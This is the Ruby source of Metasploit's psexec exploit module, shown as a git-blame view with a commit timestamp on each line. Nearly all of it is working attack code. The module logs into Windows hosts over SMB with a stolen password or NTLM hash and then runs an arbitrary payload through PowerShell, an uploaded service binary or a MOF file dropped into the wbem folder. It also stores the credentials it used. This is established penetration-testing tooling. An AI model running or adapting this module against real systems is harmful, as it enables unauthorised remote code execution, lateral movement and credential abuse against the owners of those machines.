2007-07-03 04:20:50 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2007-07-03 04:20:50 +00:00
|
|
|
##
|
|
|
|
|
2014-07-16 20:29:23 +00:00
|
|
|
# Windows XP systems that are not part of a domain default to treating all
|
|
|
|
# network logons as if they were Guest. This prevents SMB relay attacks from
|
|
|
|
# gaining administrative access to these systems. This setting can be found
|
|
|
|
# under:
|
|
|
|
#
|
|
|
|
# Local Security Settings >
|
|
|
|
# Local Policies >
|
|
|
|
# Security Options >
|
|
|
|
# Network Access: Sharing and security model for local accounts
|
2007-07-03 04:20:50 +00:00
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2015-10-30 21:21:24 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ManualRanking
|
|
|
|
|
2015-02-13 23:17:59 +00:00
|
|
|
include Msf::Exploit::Remote::SMB::Client::Psexec
|
2015-10-30 21:21:24 +00:00
|
|
|
include Msf::Exploit::Powershell
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::EXE
|
|
|
|
include Msf::Exploit::WbemExec
|
2015-10-30 21:21:24 +00:00
|
|
|
include Msf::Auxiliary::Report
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Microsoft Windows Authenticated User Code Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
This module uses a valid administrator username and password (or
|
|
|
|
password hash) to execute an arbitrary payload. This module is similar
|
|
|
|
to the "psexec" utility provided by SysInternals. This module is now able
|
|
|
|
to clean up after itself. The service created by this tool uses a randomly
|
|
|
|
chosen name and description.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'hdm',
|
2015-10-30 21:21:24 +00:00
|
|
|
'Royce Davis <rdavis[at]accuvant.com>', # (@R3dy__) PSExec command module
|
|
|
|
'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Privileged' => true,
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'WfsDelay' => 10,
|
2015-10-30 21:21:24 +00:00
|
|
|
'EXITFUNC' => 'thread'
|
2013-08-30 21:28:54 +00:00
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
|
|
|
[ 'OSVDB', '3106'],
|
2015-10-30 21:21:24 +00:00
|
|
|
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ],
|
|
|
|
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
|
|
|
|
[ 'URL', 'http://sourceforge.net/projects/smbexec/' ]
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
2015-05-20 07:07:56 +00:00
|
|
|
'Space' => 3072,
|
2013-08-30 21:28:54 +00:00
|
|
|
'DisableNops' => true,
|
|
|
|
'StackAdjustment' => -3500
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
2015-07-14 21:45:52 +00:00
|
|
|
'Arch' => [ARCH_X86, ARCH_X86_64],
|
2013-08-30 21:28:54 +00:00
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Automatic', { } ],
|
2015-10-30 21:21:24 +00:00
|
|
|
[ 'PowerShell', { } ],
|
|
|
|
[ 'Native upload', { } ],
|
|
|
|
[ 'MOF upload', { } ]
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
# For the CVE, PsExec was first released around February or March 2001
|
|
|
|
'DisclosureDate' => 'Jan 01 1999'
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])
|
|
|
|
], self.class )
|
|
|
|
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
2013-11-06 17:28:13 +00:00
|
|
|
OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
|
2014-01-06 22:45:55 +00:00
|
|
|
OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
|
2015-10-30 21:21:24 +00:00
|
|
|
OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'])
|
2013-08-30 21:28:54 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
print_status("Connecting to the server...")
|
|
|
|
connect()
|
|
|
|
|
|
|
|
print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
|
|
|
|
smb_login()
|
|
|
|
|
2013-11-06 17:28:13 +00:00
|
|
|
if not simple.client.auth_user and not datastore['ALLOW_GUEST']
|
2013-08-30 21:28:54 +00:00
|
|
|
print_line(" ")
|
|
|
|
print_error(
|
|
|
|
"FAILED! The remote host has only provided us with Guest privileges. " +
|
|
|
|
"Please make sure that the correct username and password have been provided. " +
|
|
|
|
"Windows XP systems that are not part of a domain will only provide Guest privileges " +
|
|
|
|
"to network logins by default."
|
|
|
|
)
|
|
|
|
print_line(" ")
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
if datastore['SMBUser'].to_s.strip.length > 0
|
|
|
|
report_auth
|
|
|
|
end
|
2014-06-02 19:53:40 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
case target.name
|
|
|
|
when 'Automatic'
|
|
|
|
if powershell_installed?
|
|
|
|
print_status('Selecting PowerShell target')
|
|
|
|
powershell
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
2015-10-30 21:21:24 +00:00
|
|
|
print_status('Selecting native target')
|
|
|
|
native_upload
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2015-10-30 21:21:24 +00:00
|
|
|
when 'PowerShell'
|
|
|
|
powershell
|
|
|
|
when 'Native upload'
|
|
|
|
native_upload
|
|
|
|
when 'MOF upload'
|
|
|
|
mof_upload
|
|
|
|
end
|
2014-06-02 19:20:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
|
|
|
def powershell_installed?
|
|
|
|
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
|
2014-06-02 19:20:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
case datastore['SHARE'].upcase
|
|
|
|
when 'ADMIN$'
|
|
|
|
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
|
|
|
when 'C$'
|
|
|
|
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
|
|
|
else
|
|
|
|
path = datastore['PSH_PATH']
|
|
|
|
end
|
2014-06-02 19:20:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
begin
|
|
|
|
simple.connect(share)
|
2014-06-02 19:20:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
vprint_status("Checking for #{path}")
|
|
|
|
|
|
|
|
if smb_file_exist?(path)
|
|
|
|
vprint_status('PowerShell found')
|
|
|
|
true
|
|
|
|
else
|
|
|
|
vprint_status('PowerShell not found')
|
|
|
|
false
|
|
|
|
end
|
|
|
|
ensure
|
|
|
|
simple.disconnect(share)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def powershell
|
|
|
|
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
|
|
|
|
|
|
|
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
|
|
|
|
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
|
|
|
|
end
|
|
|
|
|
|
|
|
# Execute the powershell command
|
|
|
|
print_status("#{peer} - Executing the payload...")
|
|
|
|
begin
|
|
|
|
psexec(command)
|
|
|
|
rescue StandardError => exec_command_error
|
|
|
|
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2015-10-30 21:21:24 +00:00
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
def native_upload
|
2013-08-30 21:28:54 +00:00
|
|
|
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
2015-10-30 21:21:24 +00:00
|
|
|
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
# Upload the shellcode to a file
|
|
|
|
print_status("Uploading payload...")
|
|
|
|
smbshare = datastore['SHARE']
|
|
|
|
fileprefix = ""
|
|
|
|
# if SHARE = Users/sasha/ or something like this
|
|
|
|
if smbshare =~ /.[\\\/]/
|
|
|
|
subfolder = true
|
|
|
|
smbshare = datastore['SHARE'].dup
|
|
|
|
smbshare = smbshare.gsub(/^[\\\/]/,"")
|
|
|
|
folder_list = smbshare.split(/[\\\/]/)
|
|
|
|
smbshare = folder_list[0]
|
|
|
|
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
|
|
|
|
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
|
|
|
fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
|
|
|
|
else
|
|
|
|
subfolder = false
|
|
|
|
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
|
|
|
fd = smb_open("\\#{filename}", 'rwct')
|
|
|
|
end
|
|
|
|
exe = ''
|
|
|
|
opts = { :servicename => servicename }
|
|
|
|
exe = generate_payload_exe_service(opts)
|
|
|
|
|
|
|
|
fd << exe
|
|
|
|
fd.close
|
|
|
|
|
|
|
|
if subfolder
|
|
|
|
print_status("Created \\#{fileprefix}\\#{filename}...")
|
|
|
|
else
|
|
|
|
print_status("Created \\#{filename}...")
|
|
|
|
end
|
|
|
|
|
|
|
|
# Disconnect from the share
|
|
|
|
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
|
|
|
|
|
|
|
# define the file location
|
|
|
|
if datastore['SHARE'] == 'ADMIN$'
|
|
|
|
file_location = "%SYSTEMROOT%\\#{filename}"
|
|
|
|
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
|
|
|
|
file_location = datastore['SHARE'].slice(0,1) + ":\\#{filename}"
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
2015-10-30 21:21:24 +00:00
|
|
|
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
|
|
|
|
end
|
|
|
|
|
|
|
|
psexec(file_location, false)
|
|
|
|
|
|
|
|
unless datastore['SERVICE_PERSIST']
|
|
|
|
print_status("Deleting \\#{filename}...")
|
|
|
|
#This is not really useful but will prevent double \\ on the wire :)
|
|
|
|
if datastore['SHARE'] =~ /.[\\\/]/
|
2013-08-30 21:28:54 +00:00
|
|
|
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
2015-10-30 21:21:24 +00:00
|
|
|
begin
|
|
|
|
simple.delete("\\#{fileprefix}\\#{filename}")
|
|
|
|
rescue XCEPT::ErrorCode => e
|
|
|
|
print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
|
|
|
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
2015-10-30 21:21:24 +00:00
|
|
|
begin
|
|
|
|
simple.delete("\\#{filename}")
|
|
|
|
rescue XCEPT::ErrorCode => e
|
|
|
|
print_error("Delete of \\#{filename} failed: #{e.message}")
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2015-10-30 21:21:24 +00:00
|
|
|
end
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
def mof_upload
|
|
|
|
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
|
|
|
|
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
# payload as exe
|
|
|
|
print_status("Trying wbemexec...")
|
|
|
|
print_status("Uploading Payload...")
|
|
|
|
if datastore['SHARE'] != 'ADMIN$'
|
|
|
|
print_error('Wbem will only work with ADMIN$ share')
|
|
|
|
return
|
|
|
|
end
|
|
|
|
simple.connect(share)
|
|
|
|
exe = generate_payload_exe
|
|
|
|
fd = smb_open("\\system32\\#{filename}", 'rwct')
|
|
|
|
fd << exe
|
|
|
|
fd.close
|
|
|
|
print_status("Created %SystemRoot%\\system32\\#{filename}")
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
# mof to cause execution of above
|
|
|
|
mofname = rand_text_alphanumeric(14) + ".MOF"
|
|
|
|
mof = generate_mof(mofname, filename)
|
|
|
|
print_status("Uploading MOF...")
|
|
|
|
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
|
|
|
fd << mof
|
|
|
|
fd.close
|
|
|
|
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
# Disconnect from the ADMIN$
|
|
|
|
simple.disconnect(share)
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-10-30 21:21:24 +00:00
|
|
|
def report_auth
|
|
|
|
service_data = {
|
|
|
|
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
|
|
|
|
port: datastore['RPORT'],
|
|
|
|
service_name: 'smb',
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :service,
|
|
|
|
module_fullname: self.fullname,
|
|
|
|
private_data: datastore['SMBPass'],
|
|
|
|
username: datastore['SMBUser'].downcase
|
|
|
|
}
|
|
|
|
|
|
|
|
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
|
|
|
|
credential_data.merge!({
|
|
|
|
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
|
|
|
|
realm_value: datastore['SMBDomain']
|
|
|
|
})
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2015-10-30 21:21:24 +00:00
|
|
|
|
|
|
|
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
|
|
|
|
credential_data.merge!({:private_type => :ntlm_hash})
|
|
|
|
else
|
|
|
|
credential_data.merge!({:private_type => :password})
|
|
|
|
end
|
|
|
|
|
|
|
|
credential_data.merge!(service_data)
|
|
|
|
|
|
|
|
credential_core = create_credential(credential_data)
|
|
|
|
|
|
|
|
login_data = {
|
|
|
|
access_level: 'Admin',
|
|
|
|
core: credential_core,
|
|
|
|
last_attempted_at: DateTime.now,
|
|
|
|
status: Metasploit::Model::Login::Status::SUCCESSFUL
|
|
|
|
}
|
|
|
|
|
|
|
|
login_data.merge!(service_data)
|
|
|
|
create_credential_login(login_data)
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2015-10-30 21:21:24 +00:00
|
|
|
|
2008-11-03 23:06:37 +00:00
|
|
|
end
|